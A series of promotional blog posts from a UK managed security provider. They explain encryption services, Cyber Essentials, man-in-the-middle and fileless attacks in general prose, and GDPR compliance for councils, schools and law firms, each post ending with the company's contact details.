Managed Security Services

The benefits of using a managed security service

Most organisations understand the importance of keeping data secure, but the cost of doing so, on an on-going basis, can prove prohibitive, especially to medium to small businesses, where budget constraints and lack of in-house expertise are often areas of concern, so what are the benefits of using a managed security services?

What are organisations choosing?

Managed cloud providers can enable access to technology services in a cost-effective way, bypassing the need to perform functions in-house. But, these services can leave a company’s data exposed to theft, tampering or even seizure by law enforcement agencies, from many jurisdictions, exposing the data owner to large fines, bad press and possible business collapse.

Some businesses choose to use an encryption service offered by their service provider. However, this leaves them in a weak position as the encryption is tied to that service provider and can’t expand across multiple hosting companies.

A further concern is where encryption keys are stored.  If with the hosting company it means their staff could still view your data as they have the keys and if they are not UK based, data may be made available to, for example, government agencies, especially relevant if the storage company is US-based since the Patriot Act came into force.

And, whilst the best way to protect data is by encryption, which renders it unreadable to unauthorised people, it is vital that the data can be monitored, reporting on who, or what is accessing the data and when.  This is a service that many cloud hosting services do not provide.

Simply going with one provider and not thinking of the wider consequences is leading many businesses down a false path of confidence, taking a ‘head in the sand’ stance, thinking data loss just won’t happen to them whist with a big hosting provider.

 The solution: managed security services

But, there is a solution and it is the use of a managed security service.  Such a service offers functionality that can smooth out many of the problems involved with managing data security systems. It can control on-going budgetary pressures and separate the duties between cloud service providers, data owners and data protection.

Digital Pathways managed security service

The Digital Pathways Managed Security Service uses the nCrypt solution that can handle the full range of encryption needs, both for data in transit and at rest, including full-data encryption of any server and it is transparent to the application or data structure (i.e. databases). This means that encryption and key management are provided as a unified service across all platforms.

Security server appliances are located in a protected UK based Network Operations Centre (NOC). All encryption keys and security policies are stored. The encryption is enforced at the point of data access whether that is in the cloud or within clients’ premises. It provides separation of duty between security policy and data access.

Once deployed the system provides extensive auditing of all access to data, both authorised and unauthorised, which can then be used to report to management on system activities, compliance reporting, such as GDPR and PCI or data breaches where detailed analysis is required across multiple systems, to identify any weakness or rogue activity.

Reports are generated in an easy to understand format and are emailed to designated contacts on an agreed schedule. All logs gathered, applications or proprietary systems, are stored securely in their raw format to meet auditing requirements. They are also available for use in wider reporting and management, internal audits or as evidence during an investigation.

The Digital Pathways Managed Security Service takes away the ‘pain points’, including interoperability, associated with deploying a robust data protection and auditing system. It provides organisations with reduced costs in terms of encryption deployment, maintenance and management and offers more effective controls through the provision of centralised monitoring, logging and reporting capabilities.

Using a managed security service can ensure that your digital assets remain secure, keeping your company compliant.

Every organisation can benefit from added protection. call us on 0844 586 0040, or email intouch@digitalpathways.co.uk and we’ll be happy to advise you.

Artificial Intelligence, Friend or foe?

AI, Friend or Foe?

Artificial Intelligence (AI) and Machine Learning (ML) in Cybersecurity

The buzzwords, Artificial Intelligence (AI) and Machine Learning (ML) are often interchanged. However, they are not the same thing, which can lead to confusion.

What is Machine Learning?

Machine Learning is a type of Artificial Intelligence (AI) that allows software applications to become more accurate in predicting outcomes, without being explicitly programmed.

What is Artificial Intelligence?

Artificial Intelligence (AI) is the process of simulating human intelligence, using machines, especially computer systems. The process includes learning (the acquisition of information and rules for using the information), reasoning (using the rules to reach approximate or definite conclusions) and self-correction.

AI is already used in many circumstances including in our buildings. For example, to control the environmental needs of people working within an office where, by monitoring of the volume of people in any area, AI can control whether or not the air-conditioning should be switched on or, if the lowering of shades or the opening of windows, will suffice.

And, AI will continue to expand into our daily business and personal lives.

Can Artificial Intelligence (AI) programmes ‘go rogue’?

But, although the benefits look good, there is a fear that such AI programmes could ‘go rogue’ and turn on us or, be hacked by other AI programmes.

Hackers love Artificial Intelligence (AI) and Machine Learning (ML) as much as everyone else in the technology space and are increasingly using it to improve their phishing attacks. The need for innovative and robust data security therefore becomes even more important.

Imagine a hacker taking over a building’s security system by accessing the system’s intelligence and having all key personnel move to one room, under the auspice of a ‘gunman threat’. Once the key people are in the room, through the AI’s skill in facial identification, it is locked by the system and ransom threats sent to all the computer screens in the building, using Ransomware tactics, to make people react quickly i.e. ‘the ticking count down clock’.

Although AI looks good, many of our current systems are not so ‘smart’ and use old technology. Simply bolting on AI will not give the perceived benefits, as it will be held back by the lack of integration. Given the high cost of system replacement, such as Heating Ventilation Air Conditioning (HVAC), it will be sometime before there are the platforms available to exploit the benefits of AI.

The GDPR and Artifical Intelligence (AI) Conundrum

The General Data Protection Regulation (GDPR )poses another conundrum. Will it be permissible to A let a user give an application permission to make automated decisions on their behalf, such as recommendation systems? These were first implemented in music content sites but now extend to many different industries.

For example, the AI system may learn of a user’s content preferences and push content that fits those criteria. This can help companies reduce bounce rate, by keeping the user interested. Likewise, you can use the information learned by your AI to craft better-targeted content to users with similar interests.

However, GDPR will see the AI application as holding User Personally Identifiable Information (PII), which might include age, gender and location, to present the information it has learnt from one user to others, with similar profiles. The GDPR requires that the data be secure and used appropriately. But, with the AI program constantly learning and sampling data, this becomes a problem.

And, if a user does give permission for their data to be modelled, will it be accompanied by a comprehensible explanation of how the AI makes decisions and how these decisions may impact that user? This would be very difficult to achieve as GDPR calls for ‘clear language’ and AI code learning is far from easy to explain.

From a technical perspective, the level of granularity GDPR requires, in explaining automated decisions, is unclear. Until the picture is clarified, some innovators may choose to forge ahead with super algorithms. Others, worryingly, may ban European citizens from using some highly valuable functionality.

Three laws of robotics

When thinking about automating important decisions and giving high-stake autonomy to AI machines, particular attention should be given to constraining their behaviour by defining what is desired, what is acceptable and what is not acceptable. This is what the Three Laws of Robotics of the science-fiction writer, Isaac Asimov, say:

1. A robot may not injure a human being or, through inaction, allow a human being to come to harm
2. A robot must obey the orders given by human beings, except where such orders would conflict with the First Law
3. A robot must protect its own existence as long as such protection does not conflict with the First or Second Laws.

The need for human intervention

AI power will need to be controlled and the three Laws of Robots need to be the mantra for AI programs. It should be mandated in all code that the AI programs should ask for human intervention when unusual situations are detected, or when the computed uncertainty in predictions/decisions, is above a certain threshold. This may go against the vision of AI, but until we can have total trust in the underlying code being used to develop it, we must show caution. Remember, humans, are still writing the code and can make mistakes or, more worryingly, add code that will allow for future control of the AI, for malicious means.

It is almost impossible to say how an organisation can have trust in any AI unless they have access to the source code and the ability, or contacts, to read and debug it. As AI is introduced it will fall on the facilities teams to question what level of code review has been undertaken within the AI module. This might be possible if the designer of the AI is a large vendor who can show in-depth test results and other customer implementations but, most AI vendors leading the technology revolution are small and do not have the client base, or the volume, of test data.

At this point, a difficult decision needs to be taken by management as to how far they ‘dip their toe’ into AI. A bit like autonomous cars, they do work but governments are still wary of allowing legislation to be brought in, to allow the technology.

AI is with us and will increasingly be integrated into our lives. Whilst the potential benefits are far-reaching, making lives better, the environment cleaner and providing efficiency to our personal and business lives, we must be aware of the possible threats it can create and take the appropriate action from the very beginning.

Need advice on Artificial Intelligence and Machine Learning? 

Every organisation can benefit from added protection if you have concerns with regard to Artifical Intelligence and Machine Learning give us a call on 0844 586 0040, or email intouch@digitalpathways.co.uk, and we’ll be happy to advise you.

Cyber Ess Plus logo

Why do Businesses need the Cyber Essentials Programme?

The government’s Cyber Essentials Programme was developed in collaboration with industry and is intended to help businesses mitigate common, online threats.

Operated by the National Cyber Security Centre (NCSC), it was launched in 2014 and has become a key element of excellence for cybersecurity, in all its forms.

Helping build robust data security strategies 

Applicable to all sizes of organisations, from small to large, it offers help to those seeking to implement a robust data security strategy in order to protect both themselves and their clients.

It does this by encouraging organisations to adopt good practice in information security and includes a simple set of security controls to protect information from threats coming from the Internet.

Most cyber attacks are basic in form and are often implemented by unskilled individuals.  The controls, suggested by the Cyber Essentials platform, are designed to prevent such attacks.

Cyber Essentials formats

Cyber Essentials comes in two formats:

  1. Cyber essentials – a self-assessment application that addresses basic threats and helps to prevent the most common attacks.
  2. Cyber Essentials Plus – this is the same as for Cyber Essentials but rather than being self-assessed it instead, requires verification of cybersecurity, carried out independently by a Certification Body.  This is a more rigorous form of certification, better at demonstrating to potential customers that your data security position is good and tested.

Offering a sound foundation of basic hygiene elements that all types of businesses can implement and potentially build upon. The government believes that implementing these measures can significantly reduce an organisation’s vulnerability. However, it does not offer a silver bullet to remove all cybersecurity risk; for example, it is not designed to address more advanced, targeted attacks and hence, organisations facing these threats will need to implement additional measures as part of their security strategy. What it can do is to define a focused set of controls which will provide cost-effective, basic cybersecurity for organisations of all sizes.

The Assurance Framework for Cyber Essentials

The Assurance Framework, leading to the awarding of Cyber Essentials and Cyber Essentials Plus Certificates, has been designed in consultation with SMEs to be light of touch and achievable at low cost. The two options give a choice over the level of assurance given, as well as the cost of doing so. It is important to recognise that certification only provides a snapshot of cybersecurity practices at the time of assessment.  Maintaining a robust cybersecurity stance requires additional measures, such as a sound risk management approach as well as on-going updates to the Cyber Essentials control themes, i.e. patching. But, the scheme does offer the right balance between providing an additional commitment to implementing cyber security to third parties, while retaining a simple and low-cost mechanism for doing so.

Delivering many benefits

For businesses who are willing to adopt these measures, the benefits can be many, including: the ability to tender for contracts that require a Cyber Essentials Certified supplier, enhanced customer trust and confidence, the provision of market differentiation and competitive advantage, protection of company assets and IP, the mitigation of common cyber threats and reduced insurance premiums.

The General Data Protection Regulations (GDPR) 

And, becoming accredited helps to meet the requirements of GDPR. For example, GDPR talks about controlling who has access to data and understanding where PII data is held. Cyber Essentials covers this and therefore, is able to provide evidence for your GDPR statements/policies, that as an organisation, you have considered these areas and have had the controls verified by an independent assessor.

Businesses now live with the spectre of cyber attacks as the norm. Adopting the Cyber Essentials Platform is one way of taking control and starting the process of fighting back.

Every organisation can benefit from added protection. Give us a call on 0844 586 0040, or email intouch@digitalpathways.co.uk, and we’ll be happy to advise you.

 

Man in hoody

Coming to terms with a ‘man in the middle attack’

The term a ‘man in the middle attack’ is becoming well known as more instances of them take place.

What is a ‘Man in the middle attack’?

What exactly does ‘man in the middle attack’ mean?  It is when a cyber-criminal secretly intercepts and possibly alters communication between two parties, who both believe they are directly communicating with each other.

A common example is where the cyber-criminal uses bogus emails to trick solicitors into issuing the proceeds of a house sale, to their own bank account, rather than the bona fide person.

Another example, is where an Internet connection is intercepted, often by a user not checking that they are using a valid Wi-Fi. The hacker uses a device to emulate the valid Wi-Fi in, say, a hotel and the unsuspecting victim connects to this. The hacker allows them to browse as normal until the victim goes to a site of interest, such as a bank account. Then the hacker will allow the user to log on to their account but will break the connection to the victim keeping the link to the bank open. The victim thinks the connection was lost due to the hotels’ poor Wi-Fi but the hacker continues to empty the victim’s bank account.

These kinds of attacks highlight weaknesses in an organisation’s data security strategy. Either the business has been hacked with malware, which allows the monitoring of systems, it may be due to an insider attack, where someone with internal system access is selling information to third parties, or simply poor user education or monitoring.

Data protection rackets

Increasingly today, incidents of data protection rackets, where malware is embedded and cunningly hidden, are being reported.  These attacks are designed to be undetected by the organisation and the data held by the organisation scanned. The objective is, that when valuable data is found or a file changed, such as an intellectual property modification, the content is sent to the hacker who can then sell on the information to competitors. Another data mine is where an organisation is bidding for a large contract and the hacker gains access to the proposal and sells it to other competitor bidders, so they can undercut. Over time the hacker might make the organisation aware of its activities and use this, just like the old fashioned protection rackets during the prohibition era, demanding money not to send out information.

And, a ‘man in the middle attack’ is not confined to email correspondence. It could also include voice communications, as most telephone systems use VOIP (Voice Over Internet Protocol).

Systems must be strengthened

Steps must be taken to strengthen systems against such attacks. Strong internal controls and audit procedures are needed in order to stop malware infiltrating systems in the first place, taking over the network.

Adopting advanced threat protection is vital as it stops bad processes starting, instantly blocking malware attacks. It can signal any unusual behaviour of staff and systems i.e. showing when an application is sending out data when it should not.

And of course, robust internal controls and checks should be employed when using support companies as well as the checking of system logs and user access, to understand who is touching the data, ensuring that access to it is normal. Anything odd should raise a flag.

Emails should be secure, especially if personally identifiable information is being sent and use clarification techniques, such as send and receive reports. These should not be under the control of the receiver, such as in Outlook, where a receiver can block read receipts.

Adopting Cyber Essentials Plus

The Cyber Essentials Plus Certification can offer solutions too. A government information assurance scheme, operated by the National Cyber Security Centre (NCSC), launched in 2014 and has become a key element of excellence for cybersecurity, in all its forms.

It does this by encouraging organisations to adopt good practice in information security and includes a simple set of security controls to protect information from threats coming from the Internet.

The Cyber Essentials Plus Certification requires verification of cybersecurity, carried out independently by a Certification Body, a more rigorous form of certification.

Joining up to the scheme can ensure that systems are regularly assessed and weaknesses dealt with so as to stop any security breaches, not just ‘man in the middle’.

Every organisation can benefit from added protection.

Give us a call on 0844 586 0040, or email intouch@digitalpathways.co.uk, and we’ll be happy to advise you.

 

cyber security image

Fileless Attacks: How do you protect your organisation from a threat you can’t see?

Fileless Attacks: The Threat You Can’t See

Fileless attacks are on the rise. A study by the Ponemon Institute found that 29% of the attacks faced by organisations during 2017 were fileless. This number has been increasing year on year and is expected to reach 35% in 2018.

The reason for this increase is simple. Hackers know they stand a greater chance of succeeding with a fileless attack because they are more difficult to detect. Traditional anti-malware and anti-virus tools search for malicious software by scanning a computer’s hard drive. This has led cybercriminals to pursue attacks that avoid the hard drive altogether.

How do fileless attacks work?

To avoid the hard drive, hackers hide malicious code in memory instead, using authorised native programs and tools within the operating system to attack by stealth.

This is how an attack against your organisation could occur:

  1. An employee receives a spam email with a link to a malicious website.
  2. The employee clicks on the link.
  3. The malicious website loads an authorised program, such as Flash, on the employee’s computer and exploits its known vulnerabilities.
  4. The program then opens Windows PowerShell, a native Windows tool, which is able to execute instructions through the command line while operating in memory.
  5. PowerShell downloads and runs a malicious script.
  6. The PowerShell script locates data on the employee’s computer and sends it to the attacker.

Using authorised applications already installed on the target’s computer is more discrete than placing a file on the user’s computer. The hacker can undertake the same types of attack as they otherwise could, such as ransomware attacks for example, but is far less likely to be noticed. This is why it is essential to swiftly patch and update your operating systems and software applications.

Although not truly a ‘fileless’ attack, the same attack could occur if an employee opens a Word or PDF document sent from a malicious source. With a Word document, for instance, the attack will use a Microsoft Office macro to launch PowerShell and run the hacker’s script. Programmes such as Adobe PDF Reader and Javascript all have known vulnerabilities which hackers seek to use to their advantage.

Fileless attacks will continue to rise until organisations become effective at identifying and defending themselves from this type of attack. Cybersecurity tools that learn and analyse patterns of behaviour are better placed to spot unusual activity on your networks, which could afford some protection against fileless attacks.

Cybersecurity Training

However, relying on cybersecurity tools alone is not enough. Training staff to recognise fraudulent and spam emails also needs to be a crucial element of your cybersecurity strategy. Spam emails are becoming less obvious to spot, often looking near identical to emails from a legitimate source. The few seconds it takes an employee to check the sender’s email address is accurate could be the difference between a successful and unsuccessful attack against your company.

As new modes of threat emerge, organisations must rethink the ways they protect themselves, and analyse the cybersecurity tools they use.

If you have concerns about your cybersecurity, give us a call on 0844 586 0040 or email:intouch@digitalpathways.co.uk.

We’re here to help.

 

survival in the digital age

How are Word-based fileless attacks targeting aid organisations?

Imagine you have opened a Word file that was emailed to you by a prominent organisation in your field. On the surface, nothing else happens. You notice no changes and your antivirus system doesn’t detect anything suspicious. Would you (or your employees) expect to be spied on by hackers?

This March, McAfee identified a new fileless hacking operation which is targeting humanitarian aid organisations worldwide. ‘Operation Honeybee’ tricks its targets into opening compromised Word documents. When this is achieved, their malware takes hold in the computer and allows the hackers to spy on their target undetected. They are able to escape scrutiny because of their fileless strategy.

Fileless Attacks

There has been a surge in fileless attacks. A study by the Ponemon Institute predicts they will comprise 35% of all cyber attacks in 2018. As hard drive-focused antivirus scanners become more effective, hackers are resorting to strategies which do not leave files in your directory. Instead, they exploit known weaknesses in legitimate programs which are already on your computer. Once they have gained a foothold there, they can run commands which allows them to spy on you, mine cryptocurrency, ransom your files, and even take over your entire system.

 Honeybee and spear phishing pierce your defences

Another dangerous aspect of the Honeybee operation is its use of ‘spear phishing’; a more sophisticated form of phishing. Where ordinary phishing campaigns send out misleading emails in bulk, and cross their fingers, spear phishing tailors its message to appeal to a particular target in order to increase its chances of success.

In the case of Honeybee, the hackers designed their initial email to pass for a message from the International Red Cross. They then used the decoy document to ambush employees of the aid organisations they wanted to spy on.

The Red Cross is a perfect disguise for a spear phishing operation, as it is a well-known, trusted organisation. Combining this with the fileless nature of the attack, it is even more likely to escape detection. This joint strategy can be adapted to target any industry.

Joint strategy; twofold solution

If hackers are purposefully evading traditional antivirus strategies, how can you keep your system safe? There is a twofold solution.

First of all, there are innovative antivirus programs which do protect against fileless attacks. The latest cybersecurity tools use machine learning to pinpoint unusual activity on your system. This allows them to eliminate threats which would otherwise remain hidden.

Secondly, you can implement a training strategy which will increase awareness of the strategies used by hackers. When properly prepared, members of your organisation can neutralise a threat by taking as little as a minute to verify the source of emails they receive. It really can be that simple.

Every organisation can benefit from added protection. Give us a call on 0844 586 0040, or email intouch@digitalpathways.co.uk, and we’ll be happy to advise you.

 

Flag of Europe

Building trust: What GDPR can do for your council

How would the introduction of GDPR have affected Basildon Council?

Prior to the introduction of GDPR (General Data Protection Regulation)  in 2017, Basildon Council was fined £150,000 for failing to store personal data securely. Because there was no adequate data protection policy in place, details of a family’s disabilities, including mental health issues, were published online. They remained publicly accessible for weeks. This incident had huge reputational and financial repercussions for the Council.

The £150,000 fine was imposed under the old Data Protection Act. With the enforcement of GDPR in May, the ICO are now able to impose higher fines, which go up to 4% of the organisation’s turnover, or €20,000,000, whichever is greater. What’s more, the scope of the new legislation is far broader, setting higher standards of transparency for any organisation that handles EU citizens’ data.

Councils are already failing internal audits and incurring fines on an annual basis. What will happen now GDPR is enforceable? Unless action is taken now, councils stand to fall short of the new rules and be subject to the new fines. The purpose of GDPR is to protect citizens’ rights, not to cause councils to incur avoidable costs. How can GDPR help councils prevent the kind of incident Basildon has seen, and foster trust among residents?

How can new legislation help?

There is a lot of apprehension among residents regarding their privacy. Who holds my data, and why? If personal data is stored, is it being held securely? GDPR is designed to provide answers to those questions.

If an organisation is GDPR compliant, it means that personal data is only being stored when strictly necessary and under the best possible safeguards. More than that, GDPR puts control over data back into citizens’ hands, creating a new era of transparency. This is how GDPR, instead of remaining a looming spectre, can become a tool for councils to build trust.

GDPR compliancy for councils

The task for councils is clear: they must be able to map out the exact course data takes through their systems. When a resident requests to see their personal data, the council must be able to recover it. If you imagine the amount of data currently in the hands of councils, much of it in archival storage, you will see that this is a huge undertaking.

There are other liabilities councils may not even be aware of, such as their Active Directory management. Too often, when council employees change roles, their accounts remain active. This means that they can be exploited by disgruntled ex-employees, and even become targets for hackers. By implementing a system which closes obsolete accounts, councils can ensure that access is granted only to the right people.

There are big cost-saving benefits to be achieved by creating a safe, streamlined and transparent data policy. As well as avoiding fines and passing internal audits, in the process of becoming GDPR compliant, councils can effect substantial savings by reducing their storage of obsolete data.

We have the experience and expertise to reform your data management. If you are a council looking for a GDPR compliancy solution, please contact us on 0844 586 0040 or intouch@digitalpathways.co.uk.

 

secure email image

Private Schools and Parents Face Cyber Threat

Private schools and parents face cyber threat as cybercriminals are always seeking new targets, digital security for education should not be ignored. Organisations receiving large payments, and with poorly secured IT systems are a treasure trove for hackers. Their latest campaign attacks private schools, with the aim of tricking parents into paying thousands of pounds of school fees to fraudsters’ accounts. Cybersecurity for the education sector needs to be taken seriously.

Digital Security for Education

Unfortunately, many private schools lack adequate digital security. Cybercriminals are using phishing attacks to compromise school email systems to obtain parent’s data and contact details. A common tactic involves emailing parents to explain the school’s payment details have changed and issuing a new invoice with their own bank details. Parents who reply to the email for confirmation, risk emailing the hackers instead.

It has been reported that one parent with three children at an independent school paid £70,000 to hackers after being offered a 10 per cent “early bird” discount.

“These emails can seem very real,” says Colin Tankard, Digital Pathway’s Managing Director, “And, while the private school sector seems to be the latest target of these fraudsters, they are certainly not the first or will be the last.

“Always hover your cursor over the URL and check that the address is correct.  Sometimes it may differ by one digit or letter, so vigilance is key”, he adds.

Schools and parents who find themselves the victim of these attacks are unlikely to recover their money. Payment by bank transfer is not protected, and few schools have taken out cyber insurance. For the few that have, only 38 percent of policies cover this type of crime.

Cybersecurity Training

Staff need to receive ongoing training to help them identify phishing scams that enable hackers to gain access to their systems.

Also, schools need to act quickly to ensure they are protecting the personal data they store and process. On 25th May 2018, the General Data Protection Regulations (GDPR) will replace the Data Protection Act. Failure to protect their systems from unauthorised access could see independent schools hit with colossal fines.

Compliance requires preparation, including auditing what information is held, and where, assessing threats, training staff, and updating policies and systems.

In light of the current email scam, independent schools should use a GDPR-compliant secure email service. Utilising end-to-end encryption, messages are protected from unauthorised access and e-mails rendered trusted and binding. Hackers are unable to decrypt the information being passed between the organisation and individuals. This restores confidence in email communications, knowing messages have come from a trusted source and are being sent to the intended recipient.

Our secure email service turns regular email into secure electronic communication. It is convenient, integrating with existing email solutions, and makes regular email compliant with GDPR.

With schools holding large amounts of sensitive and personal data, independent school fees attracting cybercriminals, and the imminent arrival of GDPR, it is essential schools invest in their digital security to protect themselves, their students and parents.

For advice and support with protecting your organisation from cybersecurity threats, contact us on 0844 586 0040 or email intouch@digitalpathways.co.uk.

General Data Protection Regulation

GDPR: Is Your Law Firm in the 75%?

Cybersecurity for Your Law Firm

In November 2017, it was reported that 75% of UK law firms aren’t ready for the General Data Protection Regulation (GDPR). With less than three months to go until the compliance deadline of 25th May 2018, it is more important than ever for law firms to be prepared.

The legal sector is already highly regulated, with firms needing to comply with money laundering obligations, for instance. However, we have encountered some firms who believe this degree of regulation means they will already comply with GDPR. This isn’t true. Compliance with GDPR requires its own preparation, auditing, and changes to systems and policies surrounding the processing and storing of personal data.

General Data Protection Regulation (GDPR)

GDPR places greater responsibility on organisations to review third-party agreements for compliance too. Depending on your current processes and use of third parties, this could take significant time and resource.

As a firm, you must decide if you need to appoint a Data Protection Officer, based on criteria specified in the incoming legislation, as well as reviewing (or in some cases, implementing) your data protection policy, data breach notification procedure, subject access request forms and procedures, data protection impact assessments, and consent forms.

If you aren’t sure where to begin, the Law Society is collating guidance and support to help law firms prepare for GDPR.

Cybersecurity remains as important under GDPR as it is under the current data protection framework. The legal sector is an especially attractive target for cybercriminals seeking the sensitive data and significant funds held by law firms. Alarmingly, 62% of law firms reportedly suffered a cybersecurity incident last year.

Here are three ways you can protect your law firm from cybersecurity attacks:

Cyber Training for your Law Firm staff

Every member of your firm is responsible for protecting your data. This is why it is essential to educate your staff through cybersecurity training. From spotting attempted social engineering attacks, to understanding the risk posed in finding an unidentified USB, being able to identify risks and threats could prevent a successful attack against your firm.

Secure email

Standard email is not a secure option for law firms. Unencrypted emails travel through servers located all over the world. Anyone who intercepts these communications will have access to the information being sent.

Law firms are especially likely to send emails containing sensitive information. Secure email is essential for the legal sector and has come a very long way, offering both security and convenience. Our trusted partner provides an encrypted email service that protects messages from unauthorised access and renders e-mail trusted and binding, making ordinary email compliant with GDPR.

Secure file sharing for your Law Firm

The legal sector relies on document sharing. A secure file sharing system will protect your important documents and the sensitive data you hold. Cloud services such as Dropbox and OneDrive do not encrypt your documents, leaving you vulnerable to an attack on the cloud storage provider or access requests by government authorities. Through our partnerships, we also offer a secure file sharing solution. Utilising end-to-end encryption and anonymised key management via a trusted third party, all data is securely stored within the UK.

Would you like to discuss GDPR or cybersecurity for your law firm? We’d be happy to help. Contact us on 0844 586 0040 or email intouch@digitalpathways.co.uk.

 

 

Law book & hammer, cybersecurity for law firms

Client Data: Is Your Law Firm the Weakest Point in the Cyber Security Chain?

Financial Fraud is big business for cybercriminals

During 2016, 73 out of 100 top UK law firms were targeted by hackers. Meanwhile, many smaller firms mistakenly believe they are too small or niche to attract the interest of cybercriminals. As a law firm, the information you store and process is highly valuable. By aggressively targeting law firms, hackers seek to steal sensitive information, such as commercial secrets, intellectual property, personal information, mergers and acquisitions, and market strategies. This is why you are and will continue to be the target of cyber-attacks and potential financial fraud.

Cybersecurity issues for law firms

Unfortunately, several high-profile breaches indicate that the legal sector has a cybersecurity problem. This is something cybercriminals are acutely aware of and seek to exploit. The issue is global, affecting firms all over the world. The revelation of the Panama Papers, for instance, was the result of a single cyber attack against Mossack Fonseca, a small Panamanian law firm. It is the largest data breach in history. Read more